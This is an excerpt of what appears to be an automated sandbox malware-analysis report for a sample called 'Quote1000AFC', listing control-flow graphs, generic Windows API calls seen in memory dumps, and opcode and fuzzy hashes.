69b1c89 28377->28378 28383 69b2f00 28377->28383 28378->28360 28381 69b1c89 28380->28381 28382 69b2f00 CallWindowProcW 28380->28382 28381->28360 28382->28381 28384 69b0b0c CallWindowProcW 28383->28384 28385 69b2f0a 28384->28385 28385->28378

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 164 17dac4a-17dacdf GetCurrentProcess 169 17dace8-17dad1c GetCurrentThread 164->169 170 17dace1-17dace7 164->170 171 17dad1e-17dad24 169->171 172 17dad25-17dad59 GetCurrentProcess 169->172 170->169 171->172 173 17dad5b-17dad61 172->173 174 17dad62-17dad7d call 17dae20 172->174 173->174 178 17dad83-17dadb2 GetCurrentThreadId 174->178 179 17dadbb-17dae1d 178->179 180 17dadb4-17dadba 178->180 180->179
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 017DACCE
                                                    • GetCurrentThread.KERNEL32 ref: 017DAD0B
                                                    • GetCurrentProcess.KERNEL32 ref: 017DAD48
                                                    • GetCurrentThreadId.KERNEL32 ref: 017DADA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2702109052.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_17d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: d16a83922fa165b3079693d8515c72512b82879f372aaa52f32553277ef475dd
                                                    • Instruction ID: bf946b6a4ed1b9efa07d7aa175983453aa6b97ce7a2b3150b713e6838d974d3d
                                                    • Opcode Fuzzy Hash: d16a83922fa165b3079693d8515c72512b82879f372aaa52f32553277ef475dd
                                                    • Instruction Fuzzy Hash: 615165B090130A8FEB14DFAAD548B9EFFF1FB88315F208419E419A72A0DB385844CF65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 187 17dac50-17dacdf GetCurrentProcess 191 17dace8-17dad1c GetCurrentThread 187->191 192 17dace1-17dace7 187->192 193 17dad1e-17dad24 191->193 194 17dad25-17dad59 GetCurrentProcess 191->194 192->191 193->194 195 17dad5b-17dad61 194->195 196 17dad62-17dad7d call 17dae20 194->196 195->196 200 17dad83-17dadb2 GetCurrentThreadId 196->200 201 17dadbb-17dae1d 200->201 202 17dadb4-17dadba 200->202 202->201
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 017DACCE
                                                    • GetCurrentThread.KERNEL32 ref: 017DAD0B
                                                    • GetCurrentProcess.KERNEL32 ref: 017DAD48
                                                    • GetCurrentThreadId.KERNEL32 ref: 017DADA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2702109052.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_17d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: f1e43ed9adf332dd191b198b3eed89cad32e02da3a8954bb59e6078b6a79e3cd
                                                    • Instruction ID: a8e8255cba0fec9942497d05256aa2d5367c2a0cfe0faff5026f23e55ec446c0
                                                    • Opcode Fuzzy Hash: f1e43ed9adf332dd191b198b3eed89cad32e02da3a8954bb59e6078b6a79e3cd
                                                    • Instruction Fuzzy Hash: 1F5155B090130A8FEB14DFAAD548B9EBBF1FB88315F208459E419A72A0DB395944CF65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1232 69b0b0c-69b301c 1235 69b30cc-69b30ec 1232->1235 1236 69b3022-69b3027 1232->1236 1242 69b30ef-69b30fc 1235->1242 1237 69b307a-69b30b2 CallWindowProcW 1236->1237 1238 69b3029-69b3060 1236->1238 1240 69b30bb-69b30ca 1237->1240 1241 69b30b4-69b30ba 1237->1241 1244 69b3069-69b3078 1238->1244 1245 69b3062-69b3068 1238->1245 1240->1242 1241->1240 1244->1242 1245->1244
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 069B30A1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2706226614.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_69b0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 3cd81fd5bb8149689111754546bf090c4fd0959f82f1dcdecd7b2fb2d12667d2
                                                    • Instruction ID: aab211828d114985537de0764479eb8970bc890d49050d0cba4da6928f67f728
                                                    • Opcode Fuzzy Hash: 3cd81fd5bb8149689111754546bf090c4fd0959f82f1dcdecd7b2fb2d12667d2
                                                    • Instruction Fuzzy Hash: 204158B4900309CFDB54DF99C888AAABBF5FF88314F25D459E519AB321D735A841CFA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1253 17dae98-17daf2c DuplicateHandle 1254 17daf2e-17daf34 1253->1254 1255 17daf35-17daf52 1253->1255 1254->1255
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DAF1F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2702109052.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_17d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: ceb6578998769007813860cb56930d6bda827bf90151a87054e43756fff5d2e3
                                                    • Instruction ID: fa7002cb9cd102177ed5626645b50a2dd36b91744de9239d4df18b3d2fa5f779
                                                    • Opcode Fuzzy Hash: ceb6578998769007813860cb56930d6bda827bf90151a87054e43756fff5d2e3
                                                    • Instruction Fuzzy Hash: F221E4B59002099FDB10CFAAD884ADEFFF9FB48310F14845AE918A3350D378A940CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1248 17dae90-17daf2c DuplicateHandle 1249 17daf2e-17daf34 1248->1249 1250 17daf35-17daf52 1248->1250 1249->1250
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DAF1F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2702109052.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_17d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: ae6e6ab4ea7504a04693d75a198acd20b0d34b820110cb74a5e51f8f8dd17881
                                                    • Instruction ID: 9e680bfca6199e719d3ce8ad775056e04a355da594527146811b6dc103d8204b
                                                    • Opcode Fuzzy Hash: ae6e6ab4ea7504a04693d75a198acd20b0d34b820110cb74a5e51f8f8dd17881
                                                    • Instruction Fuzzy Hash: 8921E2B5D002099FDB10CFAAD984ADEFBF5FB48320F14845AE918A3350D378A950CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1258 69b5ab8-69b623a OleInitialize 1260 69b623c-69b6242 1258->1260 1261 69b6243-69b6260 1258->1261 1260->1261
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 069B622D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2706226614.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_69b0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: a895f01e7af1baab02786c6867139e09947059ff98cf14f8343edd575197372f
                                                    • Instruction ID: c9b3d55b4b23b21e1b705c8d7c48455db5c4f40206ad9dbed5f16a0ef40053b8
                                                    • Opcode Fuzzy Hash: a895f01e7af1baab02786c6867139e09947059ff98cf14f8343edd575197372f
                                                    • Instruction Fuzzy Hash: DD1112B58003498FDB20DF9AD584BDEBBF8EB48320F208459E519A7650D378A944CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1264 69b61d0-69b61d7 1265 69b61d8-69b623a OleInitialize 1264->1265 1266 69b623c-69b6242 1265->1266 1267 69b6243-69b6260 1265->1267 1266->1267
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 069B622D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2706226614.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_69b0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 84d0183b0d23e6ec58555894bde6c4ab20802d1ea6bfe6af65ff6a4db03f361f
                                                    • Instruction ID: f503019d55770c216fdd6d3407c069146966d60937578f3919dbcfb7298a7ae8
                                                    • Opcode Fuzzy Hash: 84d0183b0d23e6ec58555894bde6c4ab20802d1ea6bfe6af65ff6a4db03f361f
                                                    • Instruction Fuzzy Hash: DE1115B58003498FDB20DF9AD945BCEFFF8EB48320F208419D619A7640D378A544CFA5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2701669357.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_153d000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 628700d3e6a254313a70e597d42d1f04d5f4571eebd732ea46d4f85e490e5673
                                                    • Instruction ID: 270960fa0dd9dce7af0b6d4f357914785410567f91331eec2991ec04cb9ad91f
                                                    • Opcode Fuzzy Hash: 628700d3e6a254313a70e597d42d1f04d5f4571eebd732ea46d4f85e490e5673
                                                    • Instruction Fuzzy Hash: 4721F1756043049FDB15DF54D884B16FBB5FBC4A14F60C969D8490F246D33AD406CA61
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2701669357.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_153d000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ffdb3b584fecd27a4652ad8a2d29a37a9cf509c79b2bbd41749459b9db2e450
                                                    • Instruction ID: da6ce995946b3e44d159b1bb3febbc56b2eff032f3ab7f48fb1282498d1622c9
                                                    • Opcode Fuzzy Hash: 7ffdb3b584fecd27a4652ad8a2d29a37a9cf509c79b2bbd41749459b9db2e450
                                                    • Instruction Fuzzy Hash: 902180755093808FCB02CF64D990715FF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2701611013.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_152d000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6b73ba65ed4a35e195f097b3394a45fe3facba1293b1f6e55983b8254f7f2e7
                                                    • Instruction ID: 46ace7d4b9fb1aa04f0bb28a82d7f5adcb22993775226a8676ba035ed17fb111
                                                    • Opcode Fuzzy Hash: b6b73ba65ed4a35e195f097b3394a45fe3facba1293b1f6e55983b8254f7f2e7
                                                    • Instruction Fuzzy Hash: 50F062724083549EE7208A5AD984B66FFE8EB45635F18C45AED0C4F2C7C279A844CAB1